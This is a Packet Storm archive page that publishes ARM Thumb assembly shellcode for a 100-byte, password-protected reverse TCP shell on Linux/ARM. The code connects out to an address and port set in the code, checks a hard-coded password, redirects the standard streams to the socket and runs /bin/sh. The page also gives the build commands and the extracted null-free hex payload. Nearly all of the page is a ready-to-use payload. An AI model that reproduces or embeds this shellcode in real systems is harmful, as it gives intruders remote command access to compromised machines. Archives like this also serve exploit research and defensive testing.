exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/ARM Password Protected Reverse TCP Shell Shellcode

Linux/ARM Password Protected Reverse TCP Shell Shellcode
Posted Apr 23, 2019
Authored by Alan Vivona

100 bytes small Linux/ARM password protected reverse TCP shell shellcode.

tags | shell, tcp, shellcode
systems | linux
SHA-256 | 9bf33e374e12b637159df9dbbfaec579d102f5a7e90543859ae1a4ac76542fc5

Linux/ARM Password Protected Reverse TCP Shell Shellcode

Change Mirror Download
/*
* Title: Linux/ARM - Password-Protected Reverse TCP Shell
* Date: 2019-04-20
* Tested: armv6 (32-bit Raspberry Pi I)
* Author: Alan Vivona - @syscall59 - medium.syscall59.com
* Size: 100 bytes
* No null bytes / Null-free
*/

.section .text
.global _start
_start:

.arm
add r3, pc, #1 // switch to thumb mode
bx r3

.thumb

// [281] socket(2, 1, 0)
mov r0, #2
mov r1, #1
eor r2, r2
mov r7, #200
add r7, #81
svc #1
mov r10, r0 // save sockfd into r10

// [283] connect(socketfd, target, addrlen)
// socket fd is in r0 already
adr r1, target
strb r2, [r1, #1] // replace the 0xff value of the protocol field with a 0x00
strb r2, [r1, #5] // replace the 1st '255' values of the IP field with a 0
strb r2, [r1, #6] // replace the 2nd '255' values of the IP field with a 0
mov r2, #16
add r7, #2 // 281 + 2 = 283
svc #1

// [003] read(sourcefd, destbuffer, amount)
push {r1}
mov r1, sp
mov r2, #4
mov r7, #3
read_pass:
mov r0, r10
svc #1
check_pass:
ldr r3, pass
ldr r4, [r1]
eor r3, r3, r4
bne read_pass

// [063] dup2(sockfd, stdIO)
mov r1, #2 // r1 = 2 (stderr)
mov r7, #63 // r7 = 63 (dup2)
loop_stdio:
mov r0, r10 // r0 = saved sockfd
svc #1
sub r1,#1
bpl loop_stdio // loop while r3 >= 0

// [011] execve(command, 0, 0)
adr r0, command
eor r2, r2
eor r1, r1
strb r2, [r0, #7]
mov r7, #11
svc #1

// 2 bytes aligment fix if needed needed (can't use a nop as it has a null byte)
// align_bytes : .byte 0xff, 0xff

target:
// The 0xff will be replaced with a null on runtime
.ascii "\x02\xff" // Protocol: IPv4/TCP.

.ascii "\x11\x5c" // Port : 4444

// The '255' will be replaced with a 0 on runtime
.byte 127,255,255,1 // IP: 127.0.0.1.

command: .ascii "/bin/sh?" // The '?' will be replaced with a null on runtime

pass: .ascii "S59!"


/*
Compile, link & extract:

as ARM-reverse-shell.s -o ARM-reverse-shell.o
ld -N ARM-reverse-shell.o -o ARM-reverse-shell
objcopy -O binary ARM-reverse-shell ARM-reverse-shell.dump
hexdump -v -e '"\\""x" 1/1 "%02x" ""' ARM-reverse-shell.dump

\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x82\x46\x0e\xa1\x4a
\x70\x4a\x71\x8a\x71\x10\x22\x02\x37\x01\xdf\x02\xb4\x69\x46\x04\x22\x03\x27\x50\x46\x01\xdf\x0b\x4b
\x0c\x68\x63\x40\xf9\xd1\x02\x21\x3f\x27\x50\x46\x01\xdf\x01\x39\xfb\xd5\x04\xa0\x52\x40\x49\x40\xc2
\x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\x7f\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x3f\x53\x35\x39\x21

*/
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    6 Files
  • 18
    Aug 18th
    4 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close